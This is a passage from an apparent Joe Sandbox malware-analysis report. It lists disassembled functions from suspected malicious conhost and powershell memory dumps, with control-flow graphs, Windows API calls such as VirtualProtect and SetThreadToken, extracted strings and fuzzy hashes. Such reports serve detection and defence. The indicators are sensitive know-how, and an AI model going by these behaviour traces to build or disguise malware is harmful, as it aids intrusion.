                                                                                            • Source File: 00000025.00000002.3819784484.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                            • Associated: 00000025.00000002.3819618588.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000025.00000002.3819907371.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000025.00000002.3820019209.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000025.00000002.3820138040.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_37_2_140000000_conhost.jbxd
                                                                                            Similarity
                                                                                            • API ID: wcslen$wcscatwcscpywcsncmp
                                                                                            • String ID: 0$X$\BaseNamedObjects\jcainqxqkscdpovyplwhuwda$`
                                                                                            • API String ID: 597572034-3841223293
                                                                                            • Opcode ID: a676fb25aaeee3b6604def02b718d9e949d38b37f356ca86444c62d74241b377
                                                                                            • Instruction ID: 28cfe78a8aee8444162dbcc10a1834099572682b5c384cadc97ca8a34bdfeb30
                                                                                            • Opcode Fuzzy Hash: a676fb25aaeee3b6604def02b718d9e949d38b37f356ca86444c62d74241b377
                                                                                            • Instruction Fuzzy Hash: FF1258B2618BC081E762CB1AF8443EA77A4F789794F414215EBA957BF5EF78C189C700
                                                                                            Function 0000000140001160 Relevance: 13.6, APIs: 9, Instructions: 130sleepstringCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000025.00000002.3819784484.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                            • Associated: 00000025.00000002.3819618588.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000025.00000002.3819907371.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000025.00000002.3820019209.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000025.00000002.3820138040.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_37_2_140000000_conhost.jbxd
                                                                                            Similarity
                                                                                            • API ID: malloc$ExceptionFilterSleepUnhandled_amsg_exit_cexit_inittermmemcpystrlen
                                                                                            • String ID:
                                                                                            • API String ID: 2643109117-0
                                                                                            • Opcode ID: 5d0fc5cb5312a86aea69d86366c04c8dca501517c33cfb13c8926ddb1e835d98
                                                                                            • Instruction ID: 6da89aac2756394a8f90a5fb187dfef0bda678cff9b9221eeeed913521154361
                                                                                            • Opcode Fuzzy Hash: 5d0fc5cb5312a86aea69d86366c04c8dca501517c33cfb13c8926ddb1e835d98
                                                                                            • Instruction Fuzzy Hash: 3E5113B1601A4485FB16EF27F9947EA27A5AB8DBD0F449121FB4D873B6DE38C4958300
                                                                                            Function 0000000140001BA0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 106memoryCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 427 140001ba0-140001bc0 428 140001bc2-140001bd7 427->428 429 140001c09 427->429 431 140001be9-140001bf1 428->431 430 140001c0c-140001c17 call 1400023b0 429->430 438 140001cf4-140001cfe call 140001d40 430->438 439 140001c1d-140001c6c call 1400024d0 VirtualQuery 430->439 432 140001bf3-140001c02 431->432 433 140001be0-140001be7 431->433 432->433 435 140001c04 432->435 433->430 433->431 437 140001cd7-140001cf3 memcpy 435->437 442 140001d03-140001d1e call 140001d40 438->442 439->442 445 140001c72-140001c79 439->445 446 140001d23-140001d38 GetLastError call 140001d40 442->446 447 140001c7b-140001c7e 445->447 448 140001c8e-140001c97 445->448 452 140001cd1 447->452 453 140001c80-140001c83 447->453 449 140001ca4-140001ccf VirtualProtect 448->449 450 140001c99-140001c9c 448->450 449->446 449->452 450->452 454 140001c9e 450->454 452->437 453->452 456 140001c85-140001c8a 453->456 454->449 456->452 457 140001c8c 456->457 457->454
                                                                                            APIs
                                                                                            • VirtualQuery.KERNEL32(?,?,?,?,0000000140007C14,0000000140007C14,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001C63
                                                                                            • VirtualProtect.KERNEL32(?,?,?,?,0000000140007C14,0000000140007C14,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001CC7
                                                                                            • memcpy.MSVCRT ref: 0000000140001CE0
                                                                                            • GetLastError.KERNEL32(?,?,?,?,0000000140007C14,0000000140007C14,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001D23
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000025.00000002.3819784484.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                            • Associated: 00000025.00000002.3819618588.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000025.00000002.3819907371.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000025.00000002.3820019209.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000025.00000002.3820138040.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_37_2_140000000_conhost.jbxd
                                                                                            Similarity
                                                                                            • API ID: Virtual$ErrorLastProtectQuerymemcpy
                                                                                            • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                                                                                            • API String ID: 2595394609-2123141913
                                                                                            • Opcode ID: fa23354802fc419f721e8d6d99bf42313c076893da16dc773a4833f7a127173c
                                                                                            • Instruction ID: 983f2cd7954f52bd80517b4e6a6dcb45ec3260e26c9f0eed5b1464496079116d
                                                                                            • Opcode Fuzzy Hash: fa23354802fc419f721e8d6d99bf42313c076893da16dc773a4833f7a127173c
                                                                                            • Instruction Fuzzy Hash: 174143F1601A4586FA26DF47F884BE927A0E78DBC4F554126EF0E877B1DA38C586C700
                                                                                            Function 0000000140002104 Relevance: 7.6, APIs: 5, Instructions: 51COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 458 140002104-14000210b 459 140002111-140002128 EnterCriticalSection 458->459 460 140002218-140002221 458->460 461 14000220b-140002212 LeaveCriticalSection 459->461 462 14000212e-14000213c 459->462 463 140002272-140002280 460->463 464 140002223-14000222d 460->464 461->460 467 14000214d-140002159 TlsGetValue GetLastError 462->467 465 140002241-140002263 DeleteCriticalSection 464->465 466 14000222f 464->466 465->463 468 140002230-14000223f 466->468 469 14000215b-14000215e 467->469 470 140002140-140002147 467->470 468->465 469->470 471 140002160-14000216d 469->471 470->461 470->467 471->470
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000025.00000002.3819784484.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                            • Associated: 00000025.00000002.3819618588.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000025.00000002.3819907371.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000025.00000002.3820019209.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000025.00000002.3820138040.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_37_2_140000000_conhost.jbxd
                                                                                            Similarity
                                                                                            • API ID: CriticalSection$DeleteEnterErrorLastLeaveValue
                                                                                            • String ID:
                                                                                            • API String ID: 926137887-0
                                                                                            • Opcode ID: 45aa12ab29fc3c2d0ae3eee0e0c0ab33baf9409f5ce98155d9c2e1cd3bee0986
                                                                                            • Instruction ID: 666b5f77822bde30b86d89f839f8ae6682933cabf40eac71bda43f7e294fb4ad
                                                                                            • Opcode Fuzzy Hash: 45aa12ab29fc3c2d0ae3eee0e0c0ab33baf9409f5ce98155d9c2e1cd3bee0986
                                                                                            • Instruction Fuzzy Hash: B821E0B1715A0292FA5BEB53F9483E923A0B76CBD0F444021FB1E576B4DF7A8986C300
                                                                                            Function 0000000140001880 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138memoryCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 474 140001880-14000189c 475 1400018a2-1400018f9 call 140002420 call 140002660 474->475 476 140001a0f-140001a1f 474->476 475->476 481 1400018ff-140001910 475->481 482 140001912-14000191c 481->482 483 14000193e-140001941 481->483 484 14000194d-140001954 482->484 485 14000191e-140001929 482->485 483->484 486 140001943-140001947 483->486 489 140001956-140001961 484->489 490 14000199e-1400019a6 484->490 485->484 487 14000192b-14000193a 485->487 486->484 488 140001a20-140001a26 486->488 487->483 492 140001b87-140001b98 call 140001d40 488->492 493 140001a2c-140001a37 488->493 494 140001970-14000199c call 140001ba0 489->494 490->476 491 1400019a8-1400019c1 490->491 495 1400019df-1400019e7 491->495 493->490 496 140001a3d-140001a5f 493->496 494->490 499 1400019e9-140001a0d VirtualProtect 495->499 500 1400019d0-1400019dd 495->500 501 140001a7d-140001a97 496->501 499->500 500->476 500->495 504 140001b74-140001b82 call 140001d40 501->504 505 140001a9d-140001afa 501->505 504->492 511 140001b22-140001b26 505->511 512 140001afc-140001b0e 505->512 515 140001b2c-140001b30 511->515 516 140001a70-140001a77 511->516 513 140001b5c-140001b6c 512->513 514 140001b10-140001b20 512->514 513->504 518 140001b6f call 140001d40 513->518 514->511 514->513 515->516 517 140001b36-140001b57 call 140001ba0 515->517 516->490 516->501 517->513 518->504
                                                                                            APIs
                                                                                            • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000140001247), ref: 00000001400019F9
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000025.00000002.3819784484.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                            • Associated: 00000025.00000002.3819618588.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000025.00000002.3819907371.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000025.00000002.3820019209.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000025.00000002.3820138040.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_37_2_140000000_conhost.jbxd
                                                                                            Similarity
                                                                                            • API ID: ProtectVirtual
                                                                                            • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
                                                                                            • API String ID: 544645111-395989641
                                                                                            • Opcode ID: a6faf70e8b190511a78e30de1eab31b3fdd89b936d163022cdfacdbb5805c305
                                                                                            • Instruction ID: bed1886f8e7b3562c786f91e2c2504e2a336d35a61311b426e06807153cec951
                                                                                            • Opcode Fuzzy Hash: a6faf70e8b190511a78e30de1eab31b3fdd89b936d163022cdfacdbb5805c305
                                                                                            • Instruction Fuzzy Hash: 415114B6B11544DAEB12CF67F840BE827A1A759BE8F548212FB1D077B4DB38C986C700
                                                                                            Function 000000014000219E Relevance: 5.0, APIs: 4, Instructions: 34COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 522 14000219e-1400021a5 523 140002272-140002280 522->523 524 1400021ab-1400021c2 EnterCriticalSection 522->524 525 140002265-14000226c LeaveCriticalSection 524->525 526 1400021c8-1400021d6 524->526 525->523 527 1400021e9-1400021f5 TlsGetValue GetLastError 526->527 528 1400021f7-1400021fa 527->528 529 1400021e0-1400021e7 527->529 528->529 530 1400021fc-140002209 528->530 529->525 529->527 530->529
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000025.00000002.3819784484.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                            • Associated: 00000025.00000002.3819618588.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000025.00000002.3819907371.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000025.00000002.3820019209.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000025.00000002.3820138040.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_37_2_140000000_conhost.jbxd
                                                                                            Similarity
                                                                                            • API ID: CriticalSection$EnterErrorLastLeaveValue
                                                                                            • String ID:
                                                                                            • API String ID: 682475483-0
                                                                                            • Opcode ID: ef714723185b3a8d2aed80037f9450dbdc245cd35eb766ee46406a0163f8cc51
                                                                                            • Instruction ID: 8e08899b71d5d6c295770fc95a4fa8b22c720a8a39741bac27afb53efd3d8dea
                                                                                            • Opcode Fuzzy Hash: ef714723185b3a8d2aed80037f9450dbdc245cd35eb766ee46406a0163f8cc51
                                                                                            • Instruction Fuzzy Hash: C201B2B5705A0192FA5BDB53FE083E86360B76CBD1F454061EF0957AB4DF79C996C200

                                                                                            Executed Functions

                                                                                            Function 0098BEA1 Relevance: 6.5, Strings: 5, Instructions: 261COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 208 98bea1-98bec9 210 98becb 208->210 211 98bece-98c209 call 98b6dc 208->211 210->211 272 98c20e-98c215 211->272
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000029.00000002.1534440511.0000000000980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_41_2_980000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: [Owr^$kKwr^$kOwr^${Kwr^${Owr^
                                                                                            • API String ID: 0-2370323555
                                                                                            • Opcode ID: 8cea6050339de13b8cd04615e90245b4ab5836b7510147dd0011a72f0deb9126
                                                                                            • Instruction ID: e887791d7aefb8b98ec427cbe67f90eb7f5fad0ff5b3be3aedeed5e7f55d823c
                                                                                            • Opcode Fuzzy Hash: 8cea6050339de13b8cd04615e90245b4ab5836b7510147dd0011a72f0deb9126
                                                                                            • Instruction Fuzzy Hash: F7915FB1B00718ABDB15EFB888115AE7BE3EF84B00F04892DD506AB750DF359E099BD5
                                                                                            Function 0098BEB0 Relevance: 6.5, Strings: 5, Instructions: 252COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 273 98beb0-98bec9 274 98becb 273->274 275 98bece-98c209 call 98b6dc 273->275 274->275 336 98c20e-98c215 275->336
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000029.00000002.1534440511.0000000000980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_41_2_980000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: [Owr^$kKwr^$kOwr^${Kwr^${Owr^
                                                                                            • API String ID: 0-2370323555
                                                                                            • Opcode ID: a9cea48c5bd3fc13e3080663deef85af0e42f1acc800afb8b215e2142001b12f
                                                                                            • Instruction ID: d9741f535b6f3e5e29f34269679c015fe0a303725fc3a587d1cd81a203bd3af1
                                                                                            • Opcode Fuzzy Hash: a9cea48c5bd3fc13e3080663deef85af0e42f1acc800afb8b215e2142001b12f
                                                                                            • Instruction Fuzzy Hash: B4914EB0B007189BDB19EFB888115AE7BE3EF84B00F04892DD506AB750DF759E099BD5
                                                                                            Function 07022E90 Relevance: 8.1, Strings: 6, Instructions: 647COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000029.00000002.1577568622.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_41_2_7020000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: pidk$pidk$pidk$pidk$pidk$|,fk
                                                                                            • API String ID: 0-2063428483
                                                                                            • Opcode ID: b7ecb8d06dfead4fe589e4e21d3b1dab48b065a5da81a3ea8188350d526fcfae
                                                                                            • Instruction ID: d3bf284fdeff9e34e27ae05f8bb85cc5be3025042f5cd985de009a78674ac2f6
                                                                                            • Opcode Fuzzy Hash: b7ecb8d06dfead4fe589e4e21d3b1dab48b065a5da81a3ea8188350d526fcfae
                                                                                            • Instruction Fuzzy Hash: 532259B2B00325DFDB54CBA8C8417AAF7E1AF85210F04C1BAE515DB351DA39C946DBA2
                                                                                            Function 07F47BCA Relevance: 1.6, APIs: 1, Instructions: 50threadCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 337 7f47bca-7f47c0b 338 7f47c13-7f47c3f SetThreadToken 337->338 339 7f47c41-7f47c47 338->339 340 7f47c48-7f47c65 338->340 339->340
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000029.00000002.1584115539.0000000007F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F40000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_41_2_7f40000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID: ThreadToken
                                                                                            • String ID:
                                                                                            • API String ID: 3254676861-0
                                                                                            • Opcode ID: 71727cb32826f6d3fa4bc11bc4cb86cbe2588fa1407124ad7fe8f2e25a02f598
                                                                                            • Instruction ID: 7155952479985b97ad6805c0ffb9ff906915ad7652525f011d102ce36b453585
                                                                                            • Opcode Fuzzy Hash: 71727cb32826f6d3fa4bc11bc4cb86cbe2588fa1407124ad7fe8f2e25a02f598
                                                                                            • Instruction Fuzzy Hash: 891125B59003498FDB10DF9AD484BDEFBF4AB48320F24846AD558A7310D774A945CFA1
                                                                                            Function 07F47BD0 Relevance: 1.5, APIs: 1, Instructions: 48threadCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 343 7f47bd0-7f47c3f SetThreadToken 345 7f47c41-7f47c47 343->345 346 7f47c48-7f47c65 343->346 345->346
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000029.00000002.1584115539.0000000007F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F40000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_41_2_7f40000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID: ThreadToken
                                                                                            • String ID:
                                                                                            • API String ID: 3254676861-0
                                                                                            • Opcode ID: 750a37095634a8287f3a69da37a345c5da0861dd7d8e856738c62703ff79371c
                                                                                            • Instruction ID: 5c1c9e1f4490e889d6ed40084bdc981b3415163c0ad5e8df90542856200132b5
                                                                                            • Opcode Fuzzy Hash: 750a37095634a8287f3a69da37a345c5da0861dd7d8e856738c62703ff79371c
                                                                                            • Instruction Fuzzy Hash: 3F1125B59003098FDB10DF9AC884B9EFBF8AB48320F24846AD518A3310C774A944CFA1
                                                                                            Function 0098E730 Relevance: 1.3, Strings: 1, Instructions: 33COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 349 98e730-98e755 351 98e75e 349->351 352 98e757 349->352 353 98e766-98e770 351->353 352->351 355 98e772 call 98e790 353->355 356 98e772 call 98e780 353->356 354 98e778-98e77b 355->354 356->354
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000029.00000002.1534440511.0000000000980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_41_2_980000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: $wr^
                                                                                            • API String ID: 0-3864684656
                                                                                            • Opcode ID: ae3d9b1dcecea6d7883e9904411c2c532869ae6fa47a172ad3854729ec95fffc
                                                                                            • Instruction ID: e0bccd1eb8dc75bc23e12e2f8008dedbb8633bb20eac1706cb62ee39ae7a663b
                                                                                            • Opcode Fuzzy Hash: ae3d9b1dcecea6d7883e9904411c2c532869ae6fa47a172ad3854729ec95fffc
                                                                                            • Instruction Fuzzy Hash: 8AE02B322457504FC313975D74110AE6FA7DAC6620314405FD049C7741CE788D058791
                                                                                            Function 00989388 Relevance: 1.3, Strings: 1, Instructions: 32COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 357 989388-9893c7 call 980b6c 365 9893c9 call 989b08 357->365 366 9893c9 call 989af9 357->366 363 9893cf-9893e4 365->363 366->363
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000029.00000002.1534440511.0000000000980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_41_2_980000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: U
                                                                                            • API String ID: 0-3372436214
                                                                                            • Opcode ID: a6112cff58d3ecebb01ff8178acba2c2f6b0fa0e4778e148bd2b66c92079a010
                                                                                            • Instruction ID: 0826f3ddb5bfc833717b85e7b491df0596c43d4a9355a7acac1d9a16fb8009c9
                                                                                            • Opcode Fuzzy Hash: a6112cff58d3ecebb01ff8178acba2c2f6b0fa0e4778e148bd2b66c92079a010
                                                                                            • Instruction Fuzzy Hash: DCF0A03130A6904BCB0A2B74A42D3FE7FA19FC6721F05006AE985CB283CF3D4E068395
                                                                                            Function 0098E740 Relevance: 1.3, Strings: 1, Instructions: 23COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 367 98e740-98e755 369 98e75e-98e770 367->369 370 98e757 367->370 373 98e772 call 98e790 369->373 374 98e772 call 98e780 369->374 370->369 372 98e778-98e77b 373->372 374->372
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000029.00000002.1534440511.0000000000980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_41_2_980000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: $wr^
                                                                                            • API String ID: 0-3864684656
                                                                                            • Opcode ID: 6850706a8172808a6351f92ab6a3c904f0747cd7a463865e77403ff21e8ce578
                                                                                            • Instruction ID: e323cee71c2e10a5f10fafdf59df5c8dcbe8729d9cf92070dc769fe9af681775
                                                                                            • Opcode Fuzzy Hash: 6850706a8172808a6351f92ab6a3c904f0747cd7a463865e77403ff21e8ce578
                                                                                            • Instruction Fuzzy Hash: 6CE0C231700710878326665EA91545F77DBDFC9760304842EE05EC7300DFB8DD0587DA
                                                                                            Function 07024870 Relevance: .3, Instructions: 311COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 584 7024870-7024895 585 702489b-70248a0 584->585 586 7024a88-7024ad2 584->586 587 70248a2-70248a8 585->587 588 70248b8-70248bc 585->588 598 7024c56-7024c6d 586->598 599 7024ad8-7024add 586->599 589 70248aa 587->589 590 70248ac-70248b6 587->590 591 70248c2-70248c4 588->591 592 7024a38-7024a42 588->592 589->588 590->588 596 70248c6-70248d2 591->596 597 70248d4 591->597 594 7024a50-7024a56 592->594 595 7024a44-7024a4d 592->595 601 7024a58-7024a5a 594->601 602 7024a5c-7024a68 594->602 600 70248d6-70248d8 596->600 597->600 604 7024af5-7024af9 599->604 605 7024adf-7024ae5 599->605 600->592 607 70248de-70248fd 600->607 608 7024a6a-7024a85 601->608 602->608 611 7024c08-7024c12 604->611 612 7024aff-7024b01 604->612 609 7024ae7 605->609 610 7024ae9-7024af3 605->610 630 70248ff-702490b 607->630 631 702490d 607->631 609->604 610->604 613 7024c14-7024c1c 611->613 614 7024c1f-7024c25 611->614 616 7024b03-7024b0f 612->616 617 7024b11 612->617 621 7024c27-7024c29 614->621 622 7024c2b-7024c37 614->622 618 7024b13-7024b15 616->618 617->618 618->611 624 7024b1b-7024b3a 618->624 625 7024c39-7024c53 621->625 622->625 637 7024b4a 624->637 638 7024b3c-7024b48 624->638 633 702490f-7024911 630->633 631->633 633->592 635 7024917-702491e 633->635 635->586 639 7024924-7024929 635->639 640 7024b4c-7024b4e 637->640 638->640 641 7024941-7024950 639->641 642 702492b-7024931 639->642 640->611 643 7024b54-7024b8b 640->643 641->592 649 7024956-7024974 641->649 644 7024933 642->644 645 7024935-702493f 642->645 655 7024ba5-7024bac 643->655 656 7024b8d-7024b93 643->656 644->641 645->641 649->592 654 702497a-702499f 649->654 654->592 668 70249a5-70249ac 654->668 659 7024bc4-7024c05 655->659 660 7024bae-7024bb4 655->660 657 7024b97-7024ba3 656->657 658 7024b95 656->658 657->655 658->655 661 7024bb6 660->661 662 7024bb8-7024bc2 660->662 661->659 662->659 669 70249f2-7024a25 668->669 670 70249ae-70249c9 668->670 679 7024a2c-7024a35 669->679 673 70249e3-70249e7 670->673 674 70249cb-70249d1 670->674 678 70249ee-70249f0 673->678 676 70249d3 674->676 677 70249d5-70249e1 674->677 676->673 677->673 678->679
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000029.00000002.1577568622.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_41_2_7020000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 1f40cb0bbd1e61ca5d3ebc3ae93714a3770f98c0c46a4d50e60b260035779281
                                                                                            • Instruction ID: e03fcd33c942ef166be727e55dfa6e8d4dee992bd0137b52f3796c1a2c6fba06
                                                                                            • Opcode Fuzzy Hash: 1f40cb0bbd1e61ca5d3ebc3ae93714a3770f98c0c46a4d50e60b260035779281
                                                                                            • Instruction Fuzzy Hash: 77A127B2B003A18FDB959B68881177EB7E29FC5210F1481BAE506DB341EA71CD43D7A3
                                                                                            Function 00982A00 Relevance: .2, Instructions: 247COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 685 982a00-982a2e 686 982a34-982a4a 685->686 687 982b05-982b47 685->687 688 982a4c 686->688 689 982a4f-982a62 686->689 691 982b4d-982b66 687->691 692 982c61-982c9c 687->692 688->689 689->687 696 982a68-982a75 689->696 694 982b68 691->694 695 982b6b-982b79 691->695 705 982cac 692->705 706 982c9e-982caa 692->706 694->695 695->692 703 982b7f-982b89 695->703 698 982a7a-982a8c 696->698 699 982a77 696->699 698->687 704 982a8e-982a98 698->704 699->698 707 982b8b-982b8d 703->707 708 982b97-982ba4 703->708 710 982a9a-982a9c 704->710 711 982aa6-982ab6 704->711 712 982cae-982cc9 705->712 706->712 707->708 708->692 709 982baa-982bba 708->709 713 982bbc 709->713 714 982bbf-982bcd 709->714 710->711 711->687 715 982ab8-982ac2 711->715 713->714 714->692 722 982bd3-982be3 714->722 718 982ad0-982b04 715->718 719 982ac4-982ac6 715->719 719->718 724 982be8-982bf5 722->724 725 982be5 722->725 724->692 728 982bf7-982c07 724->728 725->724 729 982c09 728->729 730 982c0c-982c18 728->730 729->730 730->692 732 982c1a-982c34 730->732 733 982c39 732->733 734 982c36 732->734 735 982c3e-982c48 733->735 734->733 736 982c4d-982c60 735->736
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000029.00000002.1534440511.0000000000980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_41_2_980000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 6128911c2051e70639277a7e940942cb820348b4cec08c813a415ab72cd969ef
                                                                                            • Instruction ID: 3d15fa4fde503402520c6fb3e7576ecf011e763565cc2cefa6dbe673707b949a
                                                                                            • Opcode Fuzzy Hash: 6128911c2051e70639277a7e940942cb820348b4cec08c813a415ab72cd969ef
                                                                                            • Instruction Fuzzy Hash: 46A17B74A00609CFCB15DF99C494AAEFBB1FF88310B2486A9D855AB365C735EC51CFA0
                                                                                            Function 0098C4D0 Relevance: .2, Instructions: 183COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
